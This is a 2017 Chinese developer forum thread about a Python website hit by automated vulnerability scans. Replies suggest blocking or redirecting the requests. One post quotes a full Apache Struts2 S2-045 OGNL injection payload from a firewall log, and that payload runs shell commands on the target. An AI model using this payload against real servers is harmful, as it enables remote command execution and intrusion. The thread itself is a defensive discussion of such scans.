V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
xiayibu
V2EX  ›  问与答

自己刚做好的 Python 网站每天都被人当作 PHP 网站注入攻击,怎么办

  •  
  •   xiayibu · 2017-08-26 16:17:12 +08:00 · 4613 次点击
    这是一个创建于 2648 天前的主题,其中的信息可能已经有所发展或是发生改变。
    18 条回复    2017-09-18 14:36:00 +08:00
    10467106
        1
    10467106  
       2017-08-26 16:59:44 +08:00 via iPhone
    可以关站
    UnisandK
        2
    UnisandK  
       2017-08-26 17:00:53 +08:00
    自动扫描的吧
    ETiV
        3
    ETiV  
       2017-08-26 17:02:19 +08:00 via iPhone
    可能没人蓄意攻击你,都是自动扫的

    可以把\.php$的日志关了
    wwqgtxx
        4
    wwqgtxx  
       2017-08-26 17:07:31 +08:00 via iPhone
    在前端( nginx )上直接把所有.php 返回 503 就好了
    xiayibu
        5
    xiayibu  
    OP
       2017-08-26 18:16:13 +08:00
    安全狗提示这种攻击
    拦截原因: HTTP 头部字段:HTTP_CONTENT-TYPE 包含内容:{(#Normal='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
    fzleee
        6
    fzleee  
       2017-08-26 18:22:00 +08:00 via iPhone
    redirect 到某些不可访问的网站
    jugelizi
        7
    jugelizi  
       2017-08-26 18:26:05 +08:00
    很正常
    我 java 站每天海内外的 php 请求
    php 站的 asp 请求
    Felldeadbird
        8
    Felldeadbird  
       2017-08-26 21:35:28 +08:00 via iPhone
    这种都是脚本批量检测的。
    ferock
        9
    ferock  
       2017-08-26 22:50:44 +08:00
    告诉对方,你的网站不是 php !
    Sanko
        10
    Sanko  
       2017-08-26 23:31:16 +08:00 via Android   ❤️ 1
    HttpResponse('哈麻批劳资是 python')
    zingl
        11
    zingl  
       2017-08-27 02:39:22 +08:00
    向 ip 拥有者举证投诉
    ysc3839
        12
    ysc3839  
       2017-08-27 05:11:40 +08:00 via Android   ❤️ 1
    听说过这样事,静态站,总有人扫 php,于是站长就把 php 全都重定向到一个很大的文件,比如 VPS 的测速文件。
    KgM4gLtF0shViDH3
        13
    KgM4gLtF0shViDH3  
       2017-08-27 08:56:47 +08:00 via Android
    可能是新手在学 sqlmap ?
    safedogcc
        14
    safedogcc  
       2017-08-27 09:03:05 +08:00 via iPad
    @ysc3839 #12
    好办法👍
    我已经想好,就 301 到*.G0V 。C/n 好了 /斜脸
    kylinking
        15
    kylinking  
       2017-08-27 09:14:52 +08:00 via iPhone
    @xiayibu 这不是 PHP 注入攻击,而是针对前段时间的 S2-045 漏洞,一般都是批量扫描的,发现有漏洞后会下载一些挖矿样本或者 DDoS 程序。
    fcka
        16
    fcka  
       2017-08-27 10:11:58 +08:00 via Android
    看看来源 ip,可能是阿里云的云盾干的……
    bearqq
        17
    bearqq  
       2017-08-27 10:20:55 +08:00
    @application.route('<p:re:.*>')
    def other(p):
    if ('php' in request.environ.get('bottle.raw_path')) or (request.environ.get('REMOTE_ADDR') in config.blacklist):
    return redirect('http://cachefly.cachefly.net/100mb.test')
    else:
    abort(404)
    xinxin9527
        18
    xinxin9527  
       2017-09-18 14:36:00 +08:00
    应该是自动扫描的,现在好多平台不间断的在全网扫描漏洞,并收入漏洞库,存在这种可能性。
    只要不影响主站访问,也倒没有什么,但如果题主看着觉得糟心,可以使用云防御来防护也是不错的。
    比如:知道创宇抗 D 保、百度云加速、前期网站访问量小,可以使用免费套餐的就够用了哈
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1075 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 19:49 · PVG 03:49 · LAX 11:49 · JFK 14:49
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.